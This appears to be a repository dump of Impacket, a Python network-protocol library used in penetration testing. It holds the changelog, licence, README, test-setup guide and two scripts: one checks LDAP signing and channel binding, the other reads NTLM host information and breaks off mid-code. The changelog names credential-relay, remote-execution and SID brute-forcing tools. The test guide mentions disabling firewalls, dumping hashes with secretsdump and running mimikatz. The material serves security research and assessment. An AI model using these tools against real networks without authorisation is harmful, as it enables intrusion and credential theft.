* DCERPC signing/sealing for all NTLM flavours.
* DCERPC transport now accepts an already established SMB connection.
* Basic SMBServer implementation in Python. It allows third-party DCE-RPC servers to handle DCERPC Request (by
forwarding named pipes requests).
* Minimalistic SRVSVC dcerpc server to be used by SMBServer in order to avoid Windows 7 nasty bug when that pipe's
not functional.
* DCERPC Endpoints' new calls:
* `SRVSVC`: `NetrShareEnum(Level1)`, `NetrShareGetInfo(Level2)`, `NetrServerGetInfo(Level2)`,
`NetrRemoteTOD()`, `NetprNameCanonicalize()`.
* `SVCCTL`: `CloseServiceHandle()`, `OpenSCManagerW()`, `CreateServiceW()`, `StartServiceW()`,
`OpenServiceW()`, `OpenServiceA()`, `StopService()`, `DeleteService()`, `EnumServicesStatusW()`,
`QueryServiceStatus()`, `QueryServiceConfigW()`.
* `WKSSVC`: `NetrWkstaTransportEnum()`.
* `SAMR`: `OpenAlias()`, `GetMembersInAlias()`.
* `LSARPC`: `LsarOpenPolicy2()`, `LsarLookupSids()`, `LsarClose()`.
2. New examples
* `ifmap.py`: First, this binds to the MGMT interface and gets a list of interface IDs. It adds to this a large list
of interface UUIDs seen in the wild. It then tries to bind to each interface and reports whether the interface is
listed and/or listening.
* `lookupsid.py`: DCE/RPC lookup sid brute forcer example.
* `opdump.py`: This binds to the given hostname:port and DCERPC interface. Then, it tries to call each of the first
256 operation numbers in turn and reports the outcome of each call.
* `services.py`: SVCCTL services common functions for manipulating services (START/STOP/DELETE/STATUS/CONFIG/LIST).
* `test_wkssvc`: DCE/RPC WKSSVC examples, playing with the functions Implemented.
* `smbrelayx`: Passes credentials to a third party server when doing MiTM.
* `smbserver`: Multiprocess/threading smbserver supporting common file server functions. Authentication all done but
not enforced. Tested under Windows, Linux and MacOS clients.
* `smbclient.py`: now supports history, new commands also added.
* `psexec.py`: Execute remote commands on Windows machines
================================================
FILE: Dockerfile
================================================
FROM python:3.13-alpine as compile
WORKDIR /opt
RUN apk add --no-cache git gcc musl-dev python3-dev libffi-dev openssl-dev cargo
RUN python3 -m pip install virtualenv
RUN virtualenv -p python venv
ENV PATH="/opt/venv/bin:$PATH"
RUN git clone --depth 1 https://github.com/fortra/impacket.git
RUN python3 -m pip install impacket/
FROM python:3.13-alpine
COPY --from=compile /opt/venv /opt/venv
ENV PATH="/opt/venv/bin:$PATH"
ENTRYPOINT ["/bin/sh"]
================================================
FILE: LICENSE
================================================
Licencing
---------
We provide this software under a slightly modified version of the
Apache Software License. The only changes to the document were the
replacement of "Apache" with "Impacket" and "Apache Software Foundation"
with "Fortra". Feel free to compare the resulting
document to the official Apache license.
The `Apache Software License' is an Open Source Initiative Approved
License.
The Apache Software License, Version 1.1
Modifications by Fortra (see above)
Copyright (c) 2000 The Apache Software Foundation. All rights
reserved.
Redistribution and use in source and binary forms, with or without
modification, are permitted provided that the following conditions
are met:
1. Redistributions of source code must retain the above copyright
notice, this list of conditions and the following disclaimer.
2. Redistributions in binary form must reproduce the above copyright
notice, this list of conditions and the following disclaimer in
the documentation and/or other materials provided with the
distribution.
3. The end-user documentation included with the redistribution,
if any, must include the following acknowledgment:
"This product includes software developed by
SecureAuth Corporation (https://www.secureauth.com/) and Fortra (https://www.fortra.com)."
Alternately, this acknowledgment may appear in the software itself,
if and wherever such third-party acknowledgments normally appear.
4. The names "Impacket", "SecureAuth Corporation", and "Fortra" must
not be used to endorse or promote products derived from this
software without prior written permission. For written
permission, please reach out to https://www.coresecurity.com/about/contact.
5. Products derived from this software may not be called "Impacket",
nor may "Impacket" appear in their name, without prior written
permission of Fortra.
THIS SOFTWARE IS PROVIDED ``AS IS'' AND ANY EXPRESSED OR IMPLIED
WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE IMPLIED WARRANTIES
OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE ARE
DISCLAIMED. IN NO EVENT SHALL THE APACHE SOFTWARE FOUNDATION OR
ITS CONTRIBUTORS BE LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL,
SPECIAL, EXEMPLARY, OR CONSEQUENTIAL DAMAGES (INCLUDING, BUT NOT
LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES; LOSS OF
USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER CAUSED AND
ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY,
OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT
OF THE USE OF THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF
SUCH DAMAGE.
impacket/smb.py and impacket/nmb.py are based on Pysmb by Michael Teo
(https://miketeo.net/projects/pysmb/), and are distributed under the
following license:
This software is provided 'as-is', without any express or implied
warranty. In no event will the author be held liable for any damages
arising from the use of this software.
Permission is granted to anyone to use this software for any purpose,
including commercial applications, and to alter it and redistribute it
freely, subject to the following restrictions:
1. The origin of this software must not be misrepresented; you must
not claim that you wrote the original software. If you use this
software in a product, an acknowledgment in the product
documentation would be appreciated but is not required.
2. Altered source versions must be plainly marked as such, and must
not be misrepresented as being the original software.
3. This notice cannot be removed or altered from any source
distribution.
examples/kintercept.py by Isaac Boukris (https://github.com/iboukris/S4U/)
is distributed under the following license:
Copyright (c) 2019 Isaac Boukris <iboukris@gmail.com>
Permission is hereby granted, free of charge, to any person obtaining a copy
of this software and associated documentation files (the "Software"), to deal
in the Software without restriction, including without limitation the rights
to use, copy, modify, merge, publish, distribute, sublicense, and/or sell
copies of the Software, and to permit persons to whom the Software is
furnished to do so, subject to the following conditions:
The above copyright notice and this permission notice shall be included in all
copies or substantial portions of the Software.
THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR
IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,
FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE
AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER
LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM,
OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE
SOFTWARE.
impacket/examples/recomsvc.py is based on recomsvc by Talha Tariq
and is distributed under the following license:
Copyright (c) 2006 Talha Tariq [ talha.tariq@gmail.com ]
All rights are reserved.
Permission to use, copy, modify, and distribute this software
for any purpose and without any fee is hereby granted,
provided this notice is included in its entirety in the
documentation and in the source files.
This software and any related documentation is provided "as is"
without any warranty of any kind, either express or implied,
including, without limitation, the implied warranties of
merchantability or fitness for a particular purpose. The entire
risk arising out of use or performance of the software remains
with you.
impacket/krb5/asn1.py and impacket/krb5/types.py by Marc Horowitz
are distributed under the following license:
Copyright (c) 2013, Marc Horowitz
All rights reserved.
Redistribution and use in source and binary forms, with or without
modification, are permitted provided that the following conditions are
met:
Redistributions of source code must retain the above copyright notice,
this list of conditions and the following disclaimer.
Redistributions in binary form must reproduce the above copyright
notice, this list of conditions and the following disclaimer in the
documentation and/or other materials provided with the distribution.
THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS
"AS IS" AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT
LIMITED TO, THE IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR
A PARTICULAR PURPOSE ARE DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT
HOLDER OR CONTRIBUTORS BE LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL,
SPECIAL, EXEMPLARY, OR CONSEQUENTIAL DAMAGES (INCLUDING, BUT NOT
LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES; LOSS OF USE,
DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER CAUSED AND ON ANY
THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY, OR TORT
(INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE
OF THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE.
impacket/krb5/crypto.py by the Massachusetts Institute of Technology is
distributed under the following license:
Copyright (C) 2013 by the Massachusetts Institute of Technology.
All rights reserved.
Redistribution and use in source and binary forms, with or without
modification, are permitted provided that the following conditions
are met:
* Redistributions of source code must retain the above copyright
notice, this list of conditions and the following disclaimer.
* Redistributions in binary form must reproduce the above copyright
notice, this list of conditions and the following disclaimer in
the documentation and/or other materials provided with the
distribution.
THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS
"AS IS" AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT
LIMITED TO, THE IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS
FOR A PARTICULAR PURPOSE ARE DISCLAIMED. IN NO EVENT SHALL THE
COPYRIGHT HOLDER OR CONTRIBUTORS BE LIABLE FOR ANY DIRECT,
INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL DAMAGES
(INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR
SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION)
HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT,
STRICT LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE)
ARISING IN ANY WAY OUT OF THE USE OF THIS SOFTWARE, EVEN IF ADVISED
OF THE POSSIBILITY OF SUCH DAMAGE.
================================================
FILE: MANIFEST.in
================================================
include MANIFEST.in
include LICENSE
include ChangeLog.md
include README.md
include SECURITY.md
include TESTING.md
include requirements.txt
include tox.ini
recursive-include examples tests *.txt *.py
recursive-include tests *
================================================
FILE: README.md
================================================
<img width="2043" height="571" alt="Impacket_light" src="https://github.com/user-attachments/assets/14aed700-0c6e-4865-ac53-686b91874f50" />
Impacket
========
[](https://pypi.python.org/pypi/impacket/)
[](https://github.com/fortra/impacket/actions/workflows/build_and_test.yml)
Copyright Fortra, LLC and its affiliated companies. All rights reserved.
Impacket was originally created by [SecureAuth](https://www.secureauth.com/labs/open-source-tools/impacket), and now maintained by Fortra's Core Security.
Impacket is a collection of Python classes for working with network
protocols. Impacket is focused on providing low-level
programmatic access to the packets and for some protocols (e.g.
SMB1-3 and MSRPC) the protocol implementation itself.
Packets can be constructed from scratch, as well as parsed from
raw data, and the object-oriented API makes it simple to work with
deep hierarchies of protocols. The library provides a set of tools
as examples of what can be done within the context of this library.
What protocols are featured?
----------------------------
* Ethernet, Linux "Cooked" capture.
* IP, TCP, UDP, ICMP, IGMP, ARP.
* IPv4 and IPv6 Support.
* NMB and SMB1, SMB2 and SMB3 (high-level implementations).
* MSRPC version 5, over different transports: TCP, SMB/TCP, SMB/NetBIOS and HTTP.
* Plain, NTLM and Kerberos authentications, using password/hashes/tickets/keys.
* Portions/full implementation of the following MSRPC interfaces: EPM, DTYPES, LSAD, LSAT, NRPC, RRP, SAMR, SRVS, WKST, SCMR, BKRP, DHCPM, EVEN6, MGMT, SASEC, TSCH, DCOM, WMI, OXABREF, NSPI, OXNSPI.
* Portions of TDS (MSSQL) and LDAP protocol implementations.
Maintainer
==========
[Core Security](https://www.coresecurity.com/)
Table of Contents
=================
* [Getting Impacket](#getting-impacket)
* [Setup](#setup)
* [Testing](#testing)
* [Licensing](#licensing)
* [Disclaimer](#disclaimer)
* [Contact Us](#contact-us)
Getting Impacket
================
### Latest version
* Impacket v0.13.0
[](https://pypi.python.org/pypi/impacket/)
[Current and past releases](https://github.com/fortra/impacket/releases)
### Development version
* Impacket v0.14.0-dev (**[master branch](https://github.com/fortra/impacket/tree/master)**)
[](https://github.com/fortra/impacket/tree/master)
Setup
=====
### Quick start
> :information_source: We recommend using `pipx` over `pip` for system-wide installations.
In order to grab the latest stable release run:
python3 -m pipx install impacket
If you want to play with the unreleased changes, download the development
version from the [master branch](https://github.com/fortra/impacket/tree/master),
extract the package, and execute the following command from the
directory where Impacket has been unpacked:
python3 -m pipx install .
### Docker Support
Build Impacket's image:
$ docker build -t "impacket:latest" .
Using Impacket's image:
$ docker run -it --rm "impacket:latest"
Testing
=======
The library leverages the [pytest](https://docs.pytest.org/) framework for organizing
and marking test cases, [tox](https://tox.readthedocs.io/) to automate the process of
running them across supported Python versions, and [coverage](https://coverage.readthedocs.io/)
to obtain coverage statistics.
A [comprehensive testing guide](TESTING.md) is available.
Licensing
=========
This software is provided under a slightly modified version of
the Apache Software License. See the accompanying [LICENSE](LICENSE) file for
more information.
SMBv1 and NetBIOS support based on Pysmb by Michael Teo.
Disclaimer
==========
The spirit of this Open Source initiative is to help security researchers,
and the community, speed up research and educational activities related to
the implementation of networking protocols and stacks.
The information in this repository is for research and educational purposes
and not meant to be used in production environments and/or as part
of commercial products.
If you desire to use this code or some part of it for your own uses, we
recommend applying proper security development life cycle and secure coding
practices, as well as generate and track the respective indicators of
compromise according to your needs.
Contact Us
==========
Whether you want to report a bug, send a patch, or give some suggestions
on this package, reach out to us at https://www.coresecurity.com/about/contact.
For security-related questions check our [security policy](SECURITY.md).
================================================
FILE: SECURITY.md
================================================
Security Policy
===============
Although this initiative is not meant to be used in productive environments,
if you consider that you have identified an issue that might affect the
security of its users, or you understand that the tool is being abused,
you can contact us at https://www.coresecurity.com/about/contact.
================================================
FILE: TESTING.md
================================================
Testing
=======
The library leverages the [pytest](https://docs.pytest.org/) framework for organizing
and marking test cases, [tox](https://tox.readthedocs.io/) to automate the process of
running them across supported Python versions, and [coverage](https://coverage.readthedocs.io/)
to obtain coverage statistics.
Test environment setup
----------------------
Some test cases are "local", meaning that don't require a target environment and can
be run off-line, while the bulk of the test cases are "remote" and requires some
prior setup.
If you want to run the full set of library test cases, you need to prepare your
environment by completing the following steps:
1. Install testing requirements. You can use the following command to do so:
python3 -m pip install tox -r requirements-test.txt
1. [Install and configure a target Active Directory Domain Controller](#active-directory-setup-and-configuration).
1. [Configure remote test cases](#configure-remote-test-cases).
> **Important note**
>
> Bear in mind that some remote tests are not idempotent, that means that they perform
> changes on the target environment and the results of the tests depends on that. As an
> example, some tests require the creation/modification/deletion of user accounts. If those
> tests fail at some point during the process, user accounts might lay down there and
> subsequent tests might fail when trying to create the user account. We recommend taking
> snapshots of the target environment that can be then rolled back after a testing session.
Running tests
-------------
Once that's done, you would be able to run the test suite with `pytest`. For example,
you can run all "local" test cases using the following command:
$ pytest -m "not remote"
Or run the "remote" test cases with the following command:
$ pytest -m "remote"
If all goes well, all test cases should pass.
You can also leverage `pytest` [markers](https://docs.pytest.org/en/4.6.x/example/markers.html)
or [keyword expressions](https://docs.pytest.org/en/4.6.x/usage.html#select-tests)
to select which test case you want to run. Although we recommend using `pytest`, it's also possible to run individual test
case modules via `unittest.main` method. For example, to only run `ldap` test cases,
you can execute:
$ pytest -k "ldap"
Automating runs
---------------
If you want to run the test cases in a new fresh environment, or run those across
different Python versions, you can use `tox`. You can specify the group of test cases
you want to run, which would be passed to `pytest`. As an example, the following
command will run all "local" test cases across all the Python versions defined in
the `tox` configuration:
$ tox -- -m "not remote"
Coverage
--------
If you want to measure coverage in your test cases run, you can use it via the
`pytest-cov` plugin, for example by running the following command:
$ pytest --cov --cov-config=tox.ini
`tox` will collect and report coverage statistics as well, and combine it across
different Python version environment runs. You will have a coverage HTML report
located at the default `Coverage`'s location `htlmcov/index.html`.
Configuration
-------------
Configuration of all `pytest`, `coverage` and `tox` is contained in the
[tox.ini](tox.ini) file. Refer to each tool documentation for further details
about the different settings.
Active Directory Setup and Configuration
----------------------------------------
In order to run remote test cases, a target Active Directory need to be properly
configured with the expected objects. Current remote test cases are expected to
work against a Windows Server 2012 R2 Domain Controller. The following are the
main steps required:
1. Make sure to disable the firewall on the interface you want to use for connecting
to the Domain Controller.
PS C:\> Set-NetFirewallProfile -Profile Domain, Public, Private -Enabled False
1. Install the Active Directory Domain Services on the target server.
PS C:\> Install-WindowsFeature -name AD-Domain-Services -IncludeManagementTools
1. Make sure the server's Administrator user password meet the complexity policy, as it's required
for promoting it to Domain Controller.
PS C:\> $AdminPassword = "<Admin Password>"
PS C:\> $Admin=[adsi]("WinNT://$env:COMPUTERNAME/Administrator, user")
PS C:\> $Admin.psbase.invoke("setpassword", $AdminPassword)
1. Promote the installed Windows Server 2012 R2 to a Domain Controller, and configure
a domain of your choice.
PS C:\> $DomainName = "<Domain Name>"
PS C:\> $NetBIOSName = "<NetBIOS Name>"
PS C:\> $RecoveryPassword = "<Recovery Password>"
PS C:\> $SecureRecoveryPassword = ConvertTo-SecureString $RecoveryPassword -AsPlainText -Force
PS C:\> Install-ADDSForest -DomainName $DomainName -InstallDns -SafeModeAdministratorPassword $SecureRecoveryPassword -DomainNetbiosName $NetBIOSName -SkipPreChecks
1. Install DHCP services on the target Domain Controller.
PS C:\> Install-WindowsFeature -name DHCP -IncludeManagementTools
1. Create the DHCP administration groups and authorize the server.
PS C:\> netsh dhcp add securitygroups
PS C:\> Restart-Service dhcpserver
PS C:\> Add-DhcpServerInDC -DnsName <Server Name> -IPAddress <IP Address>
PS C:\> $Credential = Get-Credential
PS C:\> Set-DhcpServerDnsCredential -Credential $Credential -ComputerName <Server Name>
1. Be sure to enable and run the `RemoteRegistry` service on the target Domain
Controller.
PS C:\> Start-Service RemoteRegistry
1. Create a Domain User with administrative rights. This is the user that will be used
to run the remote tests. We make sure to enable AES Kerberos encryption type and add
it to the Domain Admins group.
PS C:\> $AdminUserName = "<Admin User Name>"
PS C:\> $AdminAccountName = "<Admin Account Name>"
PS C:\> $AdminUserPassword = "<Admin User Password>"
PS C:\> $SecureAdminUserPassword = ConvertTo-SecureString $AdminUserPassword -AsPlainText -Force
PS C:\> New-ADUser -Name $AdminUserName -SamAccountName $AdminAccountName -UserPrincipalName $AdminAccountName@$DomainName -AccountPassword $SecureAdminUserPassword -Enabled $true -ChangePasswordAtLogon $false -KerberosEncryptionType RC4,AES128,AES256
PS C:\> Add-ADGroupMember -Identity "Domain Admins" -Members <Account Name>
### LDAPS (LDAP over SSL/TLS) configuration
For running LDAPS (LDAP over SSL/TLS) test cases, make sure you have a certificate
installed and configured on the target Domain Controller. You can follow
Microsoft's [guidelines to configure LDAPS](https://docs.microsoft.com/en-us/troubleshoot/windows-server/identity/enable-ldap-over-ssl-3rd-certification-authority).
You can use self-signed certificates by:
1. Create a CA private key and certificate:
$ openssl genrsa -aes256 -out ca_private.key 4096
$ openssl req -new -x509 -days 3650 -key ca_private.key -out ca_public.crt
1. Copying and importing the CA public certificate into the Domain
Controller server:
PS C:\> Import-Certificate -FilePath ca_public.crt -CertStoreLocation 'Cert:\LocalMachine\Root' -Verbose
1. Creating a certificate request for the LDAP service, by editing the following
configuration file:
;----------------- request.inf -----------------
[Version]
Signature="$Windows NT$
[NewRequest]
Subject = "CN=<DC fqdn>" ; replace with the FQDN of the DC
KeySpec = 1
KeyLength = 1024
Exportable = TRUE
MachineKeySet = TRUE
SMIME = False
PrivateKeyArchive = FALSE
UserProtected = FALSE
UseExistingKeySet = FALSE
ProviderName = "Microsoft RSA SChannel Cryptographic Provider"
ProviderType = 12
RequestType = PKCS10
KeyUsage = 0xa0
[EnhancedKeyUsageExtension]
OID=1.3.6.1.5.5.7.3.1 ; this is for Server Authentication
;-----------------------------------------------
And then running the following command:
PS C:\> certreq -new request.inf ldapcert.csr
1. Signing the LDAP service certificate with the CA, by creating the
`v3ext.txt` configuration file:
keyUsage=digitalSignature,keyEncipherment
extendedKeyUsage=serverAuth
subjectKeyIdentifier=hash
And running the following command:
$ openssl x509 -req -days 365 -in ldapcert.csr -CA ca_public.crt -CAkey ca_private.key -extfile v3ext.txt -set_serial 01 -out ldapcert.crt
1. Copying and installing the new signed LDAP service certificate into
the Domain Controller server:
PS C:\> certreq -accept ldapcert.crt
1. Finally, restarting the Domain Controller.
### Mimilib configuration
[Mimilib](https://github.com/gentilkiwi/mimikatz/tree/master/mimilib) test
cases require the service to be installed on the target Domain Controller. You can
do that by running Mimikatz with an elevated user and executing:
mimikatz # rpc::server
Configure Remote Test Cases
---------------------------
Create a copy of the [dcetest.cfg.template](tests/dcetests.cfg.template) file and
configure it with the necessary information associated to the Active Directory you
configured. Path to the configuration file to use when running tests can be then
specified in the following ways:
* Using the pytest `--remote-config` command-line option.
* Using the pytest `remote-config` option in `tox.ini`.
* Using the `REMOTE_CONFIG` environment variable.
* Default to loading from `tests/dcetests.cg`.
For example, you can keep configuration of different environments in
separate files, and specify which one you want the test to run against:
$ pytest --remote-config=tests/dcetests-win2016.cfg
$ pytest --remote-config=tests/dcetests-win2019.cfg
Make sure you set a user with proper administrative privileges on the
target Active Directory domain and that the user hashes and keys match with those
in the environment. Hashes and Kerberos keys can be grabbed from the target Domain
Controller using [secretsdump.py](examples/secretsdump.py) example script.
Make sure also to have full network visibility into the target hosts and be able to
resolve DNS queries for the Active Directory Domain configured. If you don't want to
change your test machine's DNS settings to point to the AD DNS server, you can
configure your system to statically resolve (e.g. via `/etc/hosts` file) the host
and domain FQDN to the server's IP address.
================================================
FILE: examples/CheckLDAPStatus.py
================================================
#!/usr/bin/env python
# Impacket - Collection of Python classes for working with network protocols.
#
# Copyright Fortra, LLC and its affiliated companies
#
# All rights reserved.
#
# This software is provided under a slightly modified version
# of the Apache Software License. See the accompanying LICENSE file
# for more information.
#
# Description:
# Check LDAP signing status and LDAPS channel binding status.
# First, the script use the given domain controller IP and domain
# name to resolve all the domain controllers. Then the checks are
# performed against all domain controllers.
#
# Author:
# Thomas Seigneuret (@zblurx)
import argparse
import logging
import sys
from dns.resolver import Resolver
from OpenSSL.SSL import SysCallError
from impacket import version
from impacket.examples import logger
from impacket.ldap.ldap import LDAPConnection, LDAPSessionError
class CheckLDAP:
def __init__(self, domain, dc_ip, timeout):
self.domain = domain
self.dc_ip = dc_ip
self.timeout = timeout
def list_dc(self):
dc_list = []
resolver = Resolver()
resolver.timeout = self.timeout
resolver.nameservers = [self.dc_ip]
dc_query = resolver.resolve(
f"_ldap._tcp.dc._msdcs.{self.domain}", 'SRV', tcp=True)
for dc in dc_query:
dc_list.append(str(dc.target).rstrip("."))
return dc_list
def run(self):
dc_list = self.list_dc()
logging.info(f"Found {len(dc_list)} domain controller(s) in {self.domain}")
for dc in dc_list:
signing_required = self.check_ldap_signing(dc)
channel_binding_status = self.check_ldaps_cbt(dc)
print(f"Hostname: {dc}\n\t> LDAP Signing Required: {signing_required}\n\t> LDAPS Channel Binding Status: {channel_binding_status}")
def check_ldaps_cbt(self, hostname):
cbt_status = "Never"
ldap_url = f"ldaps://{hostname}"
try:
ldap_connection = LDAPConnection(url=ldap_url)
ldap_connection.channel_binding_value = None
ldap_connection.login(user=" ", domain=self.domain)
except LDAPSessionError as e:
if str(e).find("data 80090346") >= 0:
cbt_status = "Always" # CBT is Required
# Login failed (wrong credentials). test if we get an error with an existing, but wrong CBT -> When supported
elif str(e).find("data 52e") >= 0:
ldap_connection = LDAPConnection(url=ldap_url)
new_cbv = bytearray(ldap_connection.channel_binding_value)
new_cbv[15] = (new_cbv[3] + 1) % 256
ldap_connection.channel_binding_value = bytes(new_cbv)
try:
ldap_connection.login(user=" ", domain=self.domain)
except LDAPSessionError as e:
if str(e).find("data 80090346") >= 0:
logging.debug(f"LDAPS channel binding is set to 'When Supported' on host {hostname}")
cbt_status = "When Supported" # CBT is When Supported
else:
logging.debug(f"LDAPSessionError while checking for channel binding requirements (likely NTLM disabled): {e!s}")
except SysCallError as e:
logging.debug(f"Received SysCallError when trying to enumerate channel binding support: {e!s}")
if e.args[1] in ["ECONNRESET", "WSAECONNRESET", "Unexpected EOF"]:
cbt_status = "No TLS cert"
else:
raise
return cbt_status
def check_ldap_signing(self, hostname):
signing_required = False
ldap_url = f"ldap://{hostname}"
try:
ldap_connection = LDAPConnection(url=ldap_url, signing=False)
ldap_connection.login(domain=self.domain)
logging.debug(f"LDAP signing is not enforced on {hostname}")
except LDAPSessionError as e:
if str(e).find("strongerAuthRequired") >= 0:
logging.debug(f"LDAP signing is enforced on {hostname}")
signing_required = True
else:
logging.debug(f"LDAPSessionError while checking for signing requirements (likely NTLM disabled): {e!s}")
return signing_required
if __name__ == '__main__':
print(version.BANNER)
parser = argparse.ArgumentParser(add_help = True, description = "LDAP signing and channel binding enumeration utility.")
parser.add_argument('-dc-ip', required=True, action='store', metavar="ip address", help='IP Address of a domain controller or a DNS resolver for the domain.')
parser.add_argument('-domain', required=True, action='store', help='<domain name>')
parser.add_argument('-debug', action='store_true', help='Turn DEBUG output ON')
parser.add_argument('-timeout', action='store', type=int, default=15, help='DNS timeout')
parser.add_argument('-ts', action='store_true', help='Adds timestamp to every logging output')
if len(sys.argv) == 1:
parser.print_help()
sys.exit(1)
options = parser.parse_args()
logger.init(options.ts, options.debug)
try:
dumper = CheckLDAP(options.domain, options.dc_ip, options.timeout)
logging.info(f"Targeted domain: {options.domain}")
dumper.run()
except Exception as e:
if logging.getLogger().level == logging.DEBUG:
import traceback
traceback.print_exc()
logging.error(str(e))
================================================
FILE: examples/DumpNTLMInfo.py
================================================
#!/usr/bin/env python
# Impacket - Collection of Python classes for working with network protocols.
#
# Copyright Fortra, LLC and its affiliated companies
#
# All rights reserved.
#
# This software is provided under a slightly modified version
# of the Apache Software License. See the accompanying LICENSE file
# for more information.
#
# Description:
# Dump remote host information in ntlm authentication model, without credentials.
# For SMB protocols (1/2/3), it's easy to use SMBConnection class (thanks to @agsolino),
# but since negotiate response is not available in original classes,
# we made out custom classes based on them.
# The usefull information in negotiate response are "Dialect Version", "Signing Options",
# "Maximum bytes allowed per smb request" and "Servers time information".
# The point is sometimes server dosn't include "boot time" in response. But we show it,
# when available, in this script.
#
# It's very easy to use:
# python DumpNTLMInfo.py 192.168.1.63
#
# Author:
# Alex Romero (@NtAlexio2)
#
# Reference for:
# [MS-SMB2]
# [MS-RPCE]
#
# ToDo:
# [ ] MSSQL
# [ ] Find new protocols using NTLM for authentication in network.
#
import os
import sys
import argparse
import logging
import struct
import socket
import math, string, random
from six import indexbytes
from datetime import datetime, timedelta, timezone
from impacket import version
from impacket import nmb, ntlm
from impacket.examples import logger
from impacket.smb import SMB, NewSMBPacket, SMBCommand, SMBNTLMDialect_Parameters,\
SMBNTLMDialect_Data, SMBExtended_Security_Parameters, SMBExtended_Security_Data, UnsupportedFeature,\
SMBSessionSetupAndX_Extended_Data, SMBSessionSetupAndX_Extended_Parameters, SMBSessionSetupAndX_Extended_Response_Parameters,\
SMBSessionSetupAndX_Extended_Response_Data, SMBSessionSetupAndXResponse_Parameters, SMB_DIALECT
from impacket.smb3structs import *
from impacket.spnego import SPNEGO_NegTokenInit, SPNEGO_NegTokenResp, TypesMech
from impacket.nt_errors import STATUS_SUCCESS, STATUS_MORE_PROCESSING_REQUIRED
from impacket.uuid import uuidtup_to_bin
from impacket.dcerpc.v5 import transport, epm
from impacket.dcerpc.v5.rpcrt import *
EPOCH_AS_FILETIME = 116444736000000000 # January 1, 1970 as MS file time
class RPC:
def __init__(self, target) -> None:
self.MaxTrasmitionSize = 0
self._initializeTransport(target)
def GetChallange(self):
ntlmChallenge = None
packet = self._create_bind_request()
self._rpctransport.send(packet.get_packet())
buffer = self._rpctransport.recv()
if buffer != 0:
response = MSRPCHeader(buffer)
bindResp = MSRPCBindAck(response.getData())
self.MaxTrasmitionSize = bindResp['max_rfrag']
ntlmChallenge = ntlm.NTLMAuthChallenge(bindResp['auth_data'])
return ntlmChallenge
def _initializeTransport(self, target):
self._rpctransport = transport.DCERPCTransportFactory(r'ncacn_ip_tcp:%s[135]' % target)
self._rpctransport.set_credentials('', '', '', '', '')
self._rpctransport.set_dport(135)
self._rpctransport.connect()
def _create_bind_request(self):
bind = MSRPCBind()
item = CtxItem()
item['AbstractSyntax'] = epm.MSRPC_UUID_PORTMAP
item['TransferSyntax'] = uuidtup_to_bin(('8a885d04-1ceb-11c9-9fe8-08002b104860', '2.0'))
item['ContextID'] = 0
item['TransItems'] = 1
bind.addCtxItem(item)
packet = MSRPCHeader()
packet['type'] = MSRPC_BIND
packet['pduData'] = bind.getData()
packet['call_id'] = 1
auth = ntlm.getNTLMSSPType1('', '', signingRequired=True, use_ntlmv2=True)
sec_trailer = SEC_TRAILER()
sec_trailer['auth_type'] = RPC_C_AUTHN_WINNT
sec_trailer['auth_level'] = RPC_C_AUTHN_LEVEL_PKT_INTEGRITY
sec_trailer['auth_ctx_id'] = 0 + 79231
pad = (4 - (len(packet.get_packet()) % 4)) % 4
if pad != 0:
packet['pduData'] += b'\xFF'*pad
sec_trailer['auth_pad_len']=pad
packet['sec_trailer'] = sec_trailer
packet['auth_data'] = auth
return packet
class SMB1:
def __init__(self, remote_name, remote_host, my_name=None,
sess_port=445, timeout=60, session=None, negSessionResponse=None):
self._uid = 0
self._dialects_data = None
self._SignatureRequired = False
self._dialects_parameters = None
self.__flags1 = SMB.FLAGS1_PATHCASELESS | SMB.FLAGS1_CANONICALIZED_PATHS
self.__flags2 = SMB.FLAGS2_EXTENDED_SECURITY | SMB.FLAGS2_NT_STATUS | SMB.FLAGS2_LONG_NAMES
self.__timeout = timeout
self._session = session
self._my_name = my_name
self._auth = None
if session is None:
self._session = nmb.NetBIOSTCPSession(my_name, remote_name, remote_host, nmb.TYPE_SERVER, sess_port, self.__timeout)
self._negotiateResponse = self._negotiateSession(negSessionResponse)
def GetNegotiateResponse(self):
return self._negotiateResponse
def GetChallange(self):
packet = NewSMBPacket()
if self._SignatureRequired:
packet['Flags2'] |= SMB.FLAGS2_SMB_SECURITY_SIGNATURE
